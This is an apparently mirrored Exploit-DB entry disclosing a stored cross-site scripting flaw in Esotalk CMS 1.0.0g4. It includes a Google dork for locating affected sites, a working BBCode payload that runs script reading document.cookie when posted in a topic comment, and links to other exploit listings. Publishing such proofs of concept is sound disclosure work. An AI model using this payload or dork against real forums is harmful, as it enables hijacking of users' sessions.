Esotalk CMS 1.0.0g4 – Cross-Site Scripting

Exploit Database
61 阅读

作者： evi1m0

日期： 2014-11-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35138/

/******************************************************
# Exploit Title: esotalk cms topics xss vulnerability 
# Google Dork: powered by esotalk
# Date: 2014-11-01
# Vul Author: Evi1m0#ff0000team
# Vul Advisory: http://www.hackersoul.com/post/ff0000-hsdb-0006.html
# Vendor Homepage: http://esotalk.org/
# Software Link: http://esotalk.org/download 
# Tested on: Linux / Windows 
******************************************************/
 
esotalk cms topics xss vulnerability. The worst is at the topic page, Submit Comment:
 
Payload:

[url=[img]onmouseover=alert(document.cookie);//://hackersoul.com/image.jpg#"aaaaaa[/img]]evi1m0#knownsec[/url]

 
You see an alert. 

Proof img url: http://www.hackersoul.com/img/media/37D2E7A3-8A88-4CE2-9E3E-E2.jpg

last Exploits
Esotalk CMS 1.0.0g4 – Cross-Site Scripting的更多信息

JForum – ‘jforum.page’ Multiple Cross-Site Scripting Vulnerabilities：
Kunena < 1.5.13 / < 1.6.3 - SQL Injection：
CMSsite 1.0 – ‘post’ SQL Injection：
XRms – Blind SQL Injection / Command Execution：
Advanced World Database 2.0.5 – SQL Injection：
Tenda ADSL Router D152 – Cross-Site Scripting：
4PSA VoIPNow Professional 2.5.3 – Multiple Vulnerabilities：
Horde Groupware Webmail 3/4/5 – Multiple Remote Code Executions：